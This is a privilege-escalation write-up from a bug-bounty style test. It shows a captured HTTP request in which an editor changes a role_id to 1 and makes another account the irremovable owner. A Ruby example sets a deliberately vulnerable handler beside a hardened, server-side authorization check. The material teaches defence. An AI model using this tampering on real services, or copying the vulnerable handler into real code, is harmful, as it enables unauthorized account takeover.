Vertical Privilege Escalation

What is vertical privilege escalation?

If a user can gain access to functionality that they are not permitted to access, that is vertical privilege escalation. For example, if a non-administrative user can reach an admin page where they can delete user accounts, that is vertical privilege escalation.

Case Study

As this was a private program, all requests and responses below use example.com as the host.

The application has a feature to add team members. The application has 3 levels of privileges:

  1. Owner (highest privileges)
  2. Editor (can read, write, update the privileges of users, and invite other users)
  3. User (read-only access)

The owner and the editor can invite team members with either editor or user privileges. Every organization has exactly one owner, created automatically when the organization's account is first set up, and nobody can delete the owner, not even the owner.

POC (Privilege escalation)

The owner of the organization cannot be removed, not even by the owner. So if I could somehow create a user with owner privileges, I could not be removed from the organization.

The first step was to create an account. I created two users, one with editor privileges and the other with user privileges.

After creating the users I logged in with the editor account and tried to change the user's role to editor.

HTTP REQUEST

POST /account_users/123 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/account/edit
X-CSRF-Token: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: 

utf8=%E2%9C%93&_method=patch&account_user%5Brole_id%5D=&account_user%5Brole_id%5D=70452

Look at the POST body: the role_id parameter is the vulnerable one. The role_id for the editor role was 70452 and for the user role it was 70451. I changed role_id=70452 to role_id=1.

And I was able to escalate the account's privileges from user to owner, a role that nobody can remove or edit.
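The root cause is that the server trusts whatever role_id arrives in the request body and never checks whether the acting user is allowed to grant that role. The Ruby below is an added illustration written for this page, not the target application's code: it parses the captured form body the way Rack does (for a repeated scalar key the last value wins, which is why the doubled account_user[role_id] in the request resolves to the real value), shows a handler that assigns the role blindly, and beside it a hardened handler that rejects unknown roles, refuses to touch the owner, and only lets an editor grant editor or user. The owner role_id of 1 is the value the write-up used; the ROLES table and the ASSIGNABLE matrix are assumptions modelled on the three privilege levels described above.

```ruby
require 'uri'

# Role IDs observed in the write-up (70451 = user, 70452 = editor) plus the
# owner ID of 1 that the author substituted. This mapping is an assumption
# for the example, not a dump of the target application's database.
ROLES = { 1 => :owner, 70451 => :user, 70452 => :editor }.freeze

# Which roles an acting user may grant. The owner role is never grantable
# through the team-member endpoint (assumption modelled on the page's
# description: owner and editor invite editors or users, a user invites nobody).
ASSIGNABLE = {
  owner:  [:editor, :user],
  editor: [:editor, :user],
  user:   []
}.freeze

class AuthorizationError < StandardError; end

# Parse an application/x-www-form-urlencoded body the way Rack does for a
# repeated scalar key: the last occurrence wins. The captured request carries
# account_user[role_id] twice (first empty), so this yields the real value.
def parse_form(body)
  URI.decode_www_form(body).each_with_object({}) { |(key, value), h| h[key] = value }
end

# Vulnerable handler: mirrors the observed behaviour. Whatever role_id the
# client sends is written to the target account with no check on who is
# asking or which role is being granted.
def update_role_vulnerable(target, body)
  role_id = Integer(parse_form(body)['account_user[role_id]'].to_s, exception: false)
  target[:role] = ROLES.fetch(role_id)
  target
end

# Hardened handler: the role must exist, the target must not be the single
# owner, and the actor's own role must permit granting the requested role.
def update_role_hardened(actor, target, body)
  role_id = Integer(parse_form(body)['account_user[role_id]'].to_s, exception: false)
  role = ROLES[role_id]
  raise AuthorizationError, "unknown role_id #{role_id.inspect}" unless role
  raise AuthorizationError, 'the owner cannot be modified' if target[:role] == :owner
  unless ASSIGNABLE.fetch(actor[:role], []).include?(role)
    raise AuthorizationError, "#{actor[:role]} may not grant #{role}"
  end
  target[:role] = role
  target
end

# Demonstration with the body from the write-up, role_id changed to 1.
if __FILE__ == $PROGRAM_NAME
  poc = 'utf8=%E2%9C%93&_method=patch&account_user%5Brole_id%5D=&account_user%5Brole_id%5D=1'
  editor = { id: 1, role: :editor }
  puts "vulnerable: target is now #{update_role_vulnerable({ id: 123, role: :user }, poc)[:role]}"
  begin
    update_role_hardened(editor, { id: 123, role: :user }, poc)
  rescue AuthorizationError => e
    puts "hardened:   rejected (#{e.message})"
  end
end
```

The fix is an authorization decision made server-side from the actor's stored role and the target's stored role, never from anything in the request body; the role_id the client sends is at most a request, not a fact.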
